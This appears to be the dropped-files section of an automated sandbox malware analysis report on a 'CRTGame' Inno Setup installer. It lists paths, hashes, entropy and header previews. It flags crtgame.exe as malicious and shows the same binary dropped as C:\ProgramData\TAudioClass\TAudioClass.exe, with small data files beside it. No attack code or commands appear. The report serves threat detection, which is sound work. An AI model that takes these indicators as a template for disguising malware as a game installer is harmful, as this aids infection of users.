Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....H...................`.....g.................................\........ .........................o.......\...............................t............................S.......................................................text...dF.......H..................`.P`.data...X....`.......L..............@.P..rdata.......p.......N..............@.`@/4.......<.......>...T..............@.0@.bss..................................`..edata..o...........................@.0@.idata..\...........................@.0..CRT....,...........................@.0..tls................................@.0..reloc..t...........................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\sqlite3.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	852754
Entropy (8bit):	6.503318968423685
Encrypted:	false
SSDEEP:	12288:fpFFQV+FKJ37Dm+yY4pBkPr2v2meLaoHN/oBrZ3ixdnGVzpJXm/iN:fpnzFw37iDYIBkzuPcHNgrZ3uGVzm/iN
MD5:	07FB6D31F37FB1B4164BEF301306C288
SHA1:	4CB41AF6D63A07324EF6B18B1A1F43CE94E25626
SHA-256:	06DDF0A370AF00D994824605A8E1307BA138F89B2D864539F0D19E8804EDAC02
SHA-512:	CAB4A7C5805B80851ABA5F2C9B001FABC1416F6648D891F49EACC81FE79287C5BAA01306A42298DA722750B812A4EA85388FFAE9200DCF656DD1D5B5B9323353
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L..Y.,..v......!......... .....................a................................O}........ ......................................@.......................P..X0...........................0.......................................................text...............................`.P`.data...............................@.`..rdata..............................@.`@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,.... ......................@.0..tls.... ....0......................@.0..rsrc........@......................@.0..reloc..X0...P...2..................@.0B/4...................&..............@.@B/19.................*..............@..B/31..........@......................@..B/45..........`......................@..B/57.................................@.0B/70.....i...............

C:\Program Files (x86)\CRTGame\bin\x86\swresample-4.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	315918
Entropy (8bit):	6.5736483262229735
Encrypted:	false
SSDEEP:	6144:zvhrZEi7+khFXxn+m0GJjExfTKqyNwEozbpT80kqD6jD1TlT5Tjalc:zvz17FhtBnLot8XD1T3ac
MD5:	201EA988661F3D1F9CA5D93DA83425E7
SHA1:	D0294DF7BA1F6CB0290E1EFEBB5B627A11C8B1F5
SHA-256:	4E4224B946A584B3D32BBABB8665B67D821BB8D15AB4C1CC4C39C71708298A39
SHA-512:	6E6FA44CE2E07177DEC6E62D0BEE5B5D3E23A243D9373FB8C6EEECEC6C6150CBD457ED8B8C84AB29133DFE954550CA972DEC504069CC411BD1193A24EA98AAEE
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).........R...................................................+....@... ......................0.......@.......p......................................................4S......................tA..$............................text...............................`..`.data...............................@....rdata...o.......p..................@..@/4......d`...`...b...D..............@..@.bss.....P...............................edata.......0......................@..@.idata.......@......................@....CRT....,....P......................@....tls.........`......................@....rsrc........p......................@..@.reloc..............................@..B........................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\tak_deco_lib.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	112640
Entropy (8bit):	6.540227486061059
Encrypted:	false
SSDEEP:	1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
MD5:	BDB65DCE335AC29ECCBC2CA7A7AD36B7
SHA1:	CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
SHA-256:	7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
SHA-512:	8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
Malicious:	false
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...N......0u............@.....................................................................2.......v...............................h...................................................................................CODE....Pe.......f.................. ..`DATA....D............j..............@...BSS......................................idata..v...........................@....edata..2...........................@..P.reloc..h...........................@..P.rsrc...............................@..P....................................@..P................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\takdec.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	772608
Entropy (8bit):	6.546391052615969
Encrypted:	false
SSDEEP:	6144:Q75mFL0MNnM/SQdtij4UujFhGiNV1SckT3wio2L2jV6EfnQ29mwF3s4iGtInw1m8:AwN0e0lN1fnQUFccGns9ukS6
MD5:	B3B487FC3832B607A853211E8AC42CAD
SHA1:	06E32C28103D33DAD53BE06C894203F8808D38C1
SHA-256:	30BC10BD6E5B2DB1ACE93C2004E24C128D20C242063D4F0889FD3FB3E284A9E4
SHA-512:	FA6BDBA4F2A0CF4CCA40A333B69FD041D9EDC0736EDA206F17F10AF5505CC4688B0401A3CAD2D2F69392E752B8877DB593C7872BCDB133DC785A200FF38598BB
Malicious:	false
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....1.d.................D..........$].......`....@.......................................@......@...................0..o............p...(...................`...............................P......................X........ .......................text...h4.......6.................. ..`.itext.......P.......:.............. ..`.data....7...`...8...H..............@....bss....0i...............................idata..............................@....didata...... ......................@....edata..o....0......................@..@.tls.........@...........................rdata..]....P......................@..@.reloc.......`......................@..B.rsrc....(...p...(..................@..@....................................@..@................

C:\Program Files (x86)\CRTGame\bin\x86\uchardet.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	294926
Entropy (8bit):	6.191604766067493
Encrypted:	false
SSDEEP:	3072:7E0FFjiAeF21pLQFgK33duKMnlCj3eWyNg2hlNvFXl8rzJjjOjVmdX566Uwqwqwm:wKFX3LygKjjN2HIfpruwqwqwFUgVE
MD5:	C76C9AE552E4CE69E3EB9EC380BC0A42
SHA1:	EFFEC2973C3D678441AF76CFAA55E781271BD1FB
SHA-256:	574595B5FD6223E4A004FA85CBB3588C18CC6B83BF3140D8F94C83D11DBCA7BD
SHA-512:	7FB385227E802A0C77749978831245235CD1343B95D97E610D20FB0454241C465387BCCB937A2EE8A2E0B461DD3D2834F7F542E7739D8E428E146F378A24EE97
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.........\|.....................n.................................c........ ......................`..j7...........................................................................................................................text...8...........................`.P`.data...x...........................@.0..rdata...F.......H..................@.`@/4.......U.......V..................@.0@.bss.........P........................`..edata..j7...`...8...$..............@.0@.idata...............\..............@.0..CRT....,............b..............@.0..tls.................d..............@.0..reloc...............f..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\utils.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	13838
Entropy (8bit):	5.173769974589746
Encrypted:	false
SSDEEP:	192:oh3ZZBe9xz7rdz9Us5bsRuKUYDpesWAhQqCNhNXUwS7RuLH9+E:ohLBe3dz9UsikKDGZqCNhNXUwS4bcE
MD5:	9C55B3E5ED1365E82AE9D5DA3EAEC9F2
SHA1:	BB3D30805A84C6F0803BE549C070F21C735E10A9
SHA-256:	D2E374DF7122C0676B4618AED537DFC8A7B5714B75D362BFBE85B38F47E3D4A4
SHA-512:	EEFE8793309FDC801B1649661B0C17C38406A9DAA1E12959CD20344975747D470D6D9C8BE51A46279A42FE1843C254C432938981D108F4899B93CDD744B5D968
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........6.........#.........2...............0....@m.................................Z........ ......................p..J.......h............................................................@......................................................text...............................`.P`.data...,....0......................@.0..rdata.......@......................@.0@/4...........P......................@.0@.bss.........`........................`..edata..J....p.......(..............@.0@.idata..h............*..............@.0..CRT....,............0..............@.0..tls.................2..............@.0..reloc...............4..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\wavpackdll.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	258560
Entropy (8bit):	6.491223412910377
Encrypted:	false
SSDEEP:	6144:X+FRYMGwNozw5upAagZnb80OXrGSc+w9nI7ZMcyVhk233M:SGMGbw5upAagZb80SMXzkgM
MD5:	DB191B89F4D015B1B9AEE99AC78A7E65
SHA1:	8DAC370768E7480481300DD5EBF8BA9CE36E11E3
SHA-256:	38A75F86DB58EB8D2A7C0213861860A64833C78F59EFF19141FFD6C3B6E28835
SHA-512:	A27E26962B43BA84A5A82238556D06672DCF17931F866D24E6E8DCE88F7B30E80BA38B071943B407A7F150A57CF1DA13D2137C235B902405BEDBE229B6D03784
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.j..f...f...f..]....f..]...f..]....f......f......f......f......f..]....f...f..]f......f......f......f...f...f......f..Rich.f..........PE..L...y.._...........!................@........ ...............................@..........................................d...$...(.......h.................... ......................................(...@............ ..8............................text...q........................... ..`asmcode.>$.......&.................. ..`.rdata..B.... ......................@..@.data...............................@....rsrc...h...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\crtgame.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	2195454
Entropy (8bit):	6.3391537227636
Encrypted:	false
SSDEEP:	24576:t70DabqUrOqdUU0FHR7F6RqubHsDoi1zTVYc60ra89K/UQOh/dYzIpnHq9jFHs0n:t70DBUrBUUS7ERqLXuHpAir
MD5:	A158C99AA92F0E29ED84BB25976D4F7A
SHA1:	165831B30EC9EA08FA80E348AE1A522256A633BD
SHA-256:	D038C11B0567EE81823A93BD8A1CC62F176AC7CE785104E7B08954B1B3D80FA4
SHA-512:	DCCF5785BA72C46CD38766610341CCC1DF2CB4C98F2C475105B06CEAE461BD109974D3B9D8DE945619B7ACFA88A85082C6EF239D7E074511B411A3706521A170
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... .ve.................0...................@....@...........................!......."......................................I..P........G...........................................................................@...............................text....+.......0.................. ..`.rdata.......@... ...@..............@..@.data....P...`...0...`..............@....rsrc....G.......P..................@..@.hsave..............................`...........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\is-BJ0D9.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	data
Category:	dropped
Size (bytes):	2195454
Entropy (8bit):	6.339153278561764
Encrypted:	false
SSDEEP:	24576:q70DabqUrOqdUU0FHR7F6RqubHsDoi1zTVYc60ra89K/UQOh/dYzIpnHq9jFHs0n:q70DBUrBUUS7ERqLXuHpAir
MD5:	4B956643F5C9B747DE0532B77F432530
SHA1:	2D74244D4F107463A2A500531C4C2136AB447192
SHA-256:	A9DCC552D890C4CCB978BCE7D0BBA244E3460CA7FA26F863E02166F15AFDE2E8
SHA-512:	DD4BDC208062BE8BC67D7E9448AFBA98D03706C76A3138E5E991A1CF734BBAFCB5AE7B6ADA54FD05FDB5E2112642C5C4E70D5A4C7208E31438A476098FB05D08
Malicious:	false
Preview:	.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... .ve.................0...................@....@...........................!......."......................................I..P........G...........................................................................@...............................text....+.......0.................. ..`.rdata.......@... ...@..............@..@.data....P...`...0...`..............@....rsrc....G.......P..................@..@.hsave..............................`...........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\stuff\date.txt (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	IFF data
Category:	dropped
Size (bytes):	1716
Entropy (8bit):	4.781797138644031
Encrypted:	false
SSDEEP:	24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
MD5:	257D1BF38FA7859FFC3717EF36577C04
SHA1:	A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
SHA-256:	DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
SHA-512:	E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
Malicious:	false
Preview:	FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith

C:\Program Files (x86)\CRTGame\stuff\is-1TQAA.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1825
Entropy (8bit):	5.088030483893024
Encrypted:	false
SSDEEP:	24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
MD5:	992C00BEAB194CE392117BB419F53051
SHA1:	8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
SHA-256:	9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
SHA-512:	FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
Malicious:	false
Preview:	.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<

C:\Program Files (x86)\CRTGame\stuff\is-2BSQM.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	IFF data
Category:	dropped
Size (bytes):	1716
Entropy (8bit):	4.781797138644031
Encrypted:	false
SSDEEP:	24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
MD5:	257D1BF38FA7859FFC3717EF36577C04
SHA1:	A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
SHA-256:	DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
SHA-512:	E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
Malicious:	false
Preview:	FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith

C:\Program Files (x86)\CRTGame\stuff\is-90TH0.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1825
Entropy (8bit):	5.088030483893024
Encrypted:	false
SSDEEP:	24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
MD5:	992C00BEAB194CE392117BB419F53051
SHA1:	8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
SHA-256:	9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
SHA-512:	FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
Malicious:	false
Preview:	.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<

C:\Program Files (x86)\CRTGame\stuff\is-N32GA.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	IFF data
Category:	dropped
Size (bytes):	1716
Entropy (8bit):	4.781797138644031
Encrypted:	false
SSDEEP:	24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
MD5:	257D1BF38FA7859FFC3717EF36577C04
SHA1:	A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
SHA-256:	DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
SHA-512:	E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
Malicious:	false
Preview:	FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith

C:\Program Files (x86)\CRTGame\stuff\tagsreplace.txt (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1825
Entropy (8bit):	5.088030483893024
Encrypted:	false
SSDEEP:	24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
MD5:	992C00BEAB194CE392117BB419F53051
SHA1:	8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
SHA-256:	9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
SHA-512:	FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
Malicious:	false
Preview:	.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<

C:\Program Files (x86)\CRTGame\uninstall\is-TGPT7.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	714526
Entropy (8bit):	6.5053900039496435
Encrypted:	false
SSDEEP:	12288:fRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExycy:5ObekrkfohrP337uzHnA6cHiiHEVVg6i
MD5:	3910EA485B6F67ECAF6B34DDB4BE5980
SHA1:	85C397003697A6DCDBCAD43B2C7F8336BE99CA5F
SHA-256:	FD2C46551A5A55A0C2B5A12AE2385BE68681AE8E8DFA1E0C3AD686057795CC45
SHA-512:	65977C0A6E1E21D056080CCC733C303880141AF0E585275041274D6D41742FDCEDE4B3369D56A0D0C4B2A5F3AC734E48234110B8D81C43ADA5CBC10619B0DB45
Malicious:	false
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d..........lp............@..............................................@...............................%..................................................................................................................CODE.....b.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................

C:\Program Files (x86)\CRTGame\uninstall\unins000.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	InnoSetup Log CRTGame, version 0x30, 8020 bytes, 123991\user, "C:\Program Files (x86)\CRTGame"
Category:	dropped
Size (bytes):	8020
Entropy (8bit):	5.054219724696777
Encrypted:	false
SSDEEP:	96:93N8WVPpvzbK+T4hlOIhlXWx4cVSQs0Ln9qE2VYW4P:998WVPpvd+QIhs+cVSQ1nEmd
MD5:	1173714B5C34DCF2100593A45F883F53
SHA1:	323517FBD4C6A68A28352A48FD60CA1EE5113F8B
SHA-256:	9DAF91B8D8AF732EB5DE9A0CC9D713D510103B82D16284FE8FC611BD387FC24F
SHA-512:	F729048FCE42BE78E8674AEC9681EFD434999FE1D726CBEDD04A8C1DD20CCF5A194DFD8782D0B135FF1CA9411BCF61E387BB8AB51CA1A263C054D065A31044A8
Malicious:	false
Preview:	Inno Setup Uninstall Log (b)....................................CRTGame.........................................................................................................................CRTGame.........................................................................................................................0...G...T...%...............................................................................................................>7.?................>....123991.user.C:\Program Files (x86)\CRTGame...........4...u.. ..........h.IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...............................o...........!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32.dll.GetSystemMetr

C:\Program Files (x86)\CRTGame\uninstall\unins000.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	714526
Entropy (8bit):	6.5053900039496435
Encrypted:	false
SSDEEP:	12288:fRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExycy:5ObekrkfohrP337uzHnA6cHiiHEVVg6i
MD5:	3910EA485B6F67ECAF6B34DDB4BE5980
SHA1:	85C397003697A6DCDBCAD43B2C7F8336BE99CA5F
SHA-256:	FD2C46551A5A55A0C2B5A12AE2385BE68681AE8E8DFA1E0C3AD686057795CC45
SHA-512:	65977C0A6E1E21D056080CCC733C303880141AF0E585275041274D6D41742FDCEDE4B3369D56A0D0C4B2A5F3AC734E48234110B8D81C43ADA5CBC10619B0DB45
Malicious:	false
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d..........lp............@..............................................@...............................%..................................................................................................................CODE.....b.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................

C:\ProgramData\TAudioClass\TAudioClass.exe

Download File

Process:	C:\Program Files (x86)\CRTGame\crtgame.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2195454
Entropy (8bit):	6.3391537227636
Encrypted:	false
SSDEEP:	24576:t70DabqUrOqdUU0FHR7F6RqubHsDoi1zTVYc60ra89K/UQOh/dYzIpnHq9jFHs0n:t70DBUrBUUS7ERqLXuHpAir
MD5:	A158C99AA92F0E29ED84BB25976D4F7A
SHA1:	165831B30EC9EA08FA80E348AE1A522256A633BD
SHA-256:	D038C11B0567EE81823A93BD8A1CC62F176AC7CE785104E7B08954B1B3D80FA4
SHA-512:	DCCF5785BA72C46CD38766610341CCC1DF2CB4C98F2C475105B06CEAE461BD109974D3B9D8DE945619B7ACFA88A85082C6EF239D7E074511B411A3706521A170
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... .ve.................0...................@....@...........................!......."......................................I..P........G...........................................................................@...............................text....+.......0.................. ..`.rdata.......@... ...@..............@..@.data....P...`...0...`..............@....rsrc....G.......P..................@..@.hsave..............................`...........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\rc.dat

Download File

Process:	C:\Program Files (x86)\CRTGame\crtgame.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:2:2
MD5:	7303F017FE369F9CE5AF630DA93BA867
SHA1:	2F086FC767A0DAC59A38C67F409B4F74A1EAB39F
SHA-256:	E8613F5A5BC9F9FEEDA32A8E7C80B69DD4878E47B6A91723FB15EB84236B6A2B
SHA-512:	041565F019C723420925EEADBCAFD2D4FAB8AA4DB491542298E8936A9BCFDB4FC925EA181E3C8754A4E07685A1C94C955E9041C66348B73ED5720A9BC5B21460
Malicious:	false
Preview:	....

C:\ProgramData\resource.dat

Download File

Process:	C:\Program Files (x86)\CRTGame\crtgame.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	128
Entropy (8bit):	2.862976125752538
Encrypted:	false
SSDEEP:	3:1k/QnTzXD9iIgAnDTa3pkHil/:11TzXD9iIxPa3pkHit
MD5:	785BB7F0B0CEF59C39B9F5E21CD2FD04
SHA1:	1E1FFDEE1584A00BDE18BD7BD19C02988301C250
